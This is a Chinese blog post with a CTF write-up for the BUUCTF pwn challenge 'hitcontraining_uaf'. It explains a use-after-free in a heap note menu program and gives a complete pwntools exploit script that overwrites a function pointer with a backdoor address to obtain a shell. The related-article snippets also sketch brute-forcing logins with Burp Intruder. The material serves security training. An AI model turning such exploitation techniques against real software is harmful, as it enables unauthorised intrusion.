buu|hitcontraining_uaf 1

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量156 收藏 3
点赞数
分类专栏: buuctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64236521/article/details/125688009
版权
buuctf 同时被 2 个专栏收录
10 篇文章 1 订阅
订阅专栏
pwn
6 篇文章 1 订阅
订阅专栏

buu|hitcontraining_uaf 1

一道典型的菜单类堆题,并有后门
在这里插入图片描述
在这里插入图片描述

其主函数中add:
在这里插入图片描述
这里一次会申请两个堆,其中第一个堆放着print_note_content
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中
在这里插入图片描述

在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可
申请两个堆块儿

add('40','aaaa')  #chunk0
add('40','aaaa')  #chunk1

在这里插入图片描述
释放掉

delete('0')
delete('1')

在这里插入图片描述
0x10里有两个堆,都是之前存放print_note_content的。
再申请大小为0x8 的堆,0x10里的两个堆就会被申请出来,其中一个我们就可以修改了.

gdb.attach(p)
add('8',p32(backdoor))

在这里插入图片描述
exp如下

from pwn import*
#p=remote('node4.buuoj.cn',25381)
p=process('./hacknote')
context(os='linux',log_level='debug',arch='i386')
def add(size,content):
	p.sendafter(b'Your choice :','1')
	p.sendafter(b'Note size :',size)
	p.sendafter(b'Content :',content)
	
def delete(index):
	p.sendafter(b'Your choice :','2')
	p.sendafter(b'Index :',index)
	
def printf(index):
	p.sendafter(b'Your choice :','3')
	p.sendafter(b'Index :',index)
	
backdoor=0x08048945

add('40','aaaa')  #chunk0
#gdb.attach(p)
add('40','aaaa')  #chunk1
gdb.attach(p)
delete('0')
delete('1')
gdb.attach(p)
add('8',p32(backdoor))  #chunk2
gdb.attach(p)
printf('0')
p.interactive()

flag
在这里插入图片描述

嚚_瘖
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 926
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
hitcontraining_uaf
z1r0的博客
12-10 1520
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 323
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 311
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
cipher_CIPHER_
09-29
1. **Cipher功能介绍**:解释芯片内置的加密引擎如何工作,支持哪些加密标准和模式,如ECB、CBC、CFB、OFB、CTR等。 2. **API接口**:列出与Cipher相关的软件接口,包括初始化、设置密钥、加密/解密数据及清理资源...
POSN:POSN-BUU的源代码
04-01
1. **面向对象编程**:C++支持面向对象编程(OOP),这可能意味着代码中包含多个类,每个类代表了系统中的一个实体或功能,如定位器、传感器、数据处理器等。类之间可能存在继承、封装和多态性等特性。 2. **模板和...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ ... docker exec -i -t --user magento magento2_php-apache_1 insta
hitcontrainingUAF之我见
TedLau的博客
06-16 272
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
【pwn】hitcontraining_uaf --堆利用之uaf
question55的博客
01-12 437
a。
hitcontraining_uaf【write up】
m0_73756460的博客
01-25 113
buu刷题hitcontraining_uaf【write up】
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1650
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 1997
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
好好说话之Use After Free
hollk’s blog
09-28 4797
到了Use After Free啦,总体来说这种手法并不复杂,特征也很明显,就是在静态分析阶段观察释放chunk之后指针是否置空。本以为参加hw会往后拖更,没想到这么快就写完了。如果前面一直跟着学的话这部分也应该难不到你,我会在接下来的Fastbin Attack等你,加油~
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 529
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看响应来获取flag。具体操作步骤如下: 1. 打开Burp Suite,配置代理并将目标网站的浏览器流量通过Burp Suite代理。 2. 在Burp Suite的Intruder选项卡中,将攻击类型设置为Cluster Bomb。 3. 在Payload Options中,选择Simple List作为Payload类型,并加载合适的用户名爆破字典。 4. 去掉Payload Encoding选项中的勾选。 5. 点击Start Attack开始用户名爆破。 6. 根据引用所述,接着切换到密码爆破模式。在Payload Options中,将Payload类型设置为Numbers,或继续使用Simple List加载包含0000~9999的密码字典。 7. 再次点击Start Attack开始密码爆破。 8. 查看响应,找到正确的密码并获取flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值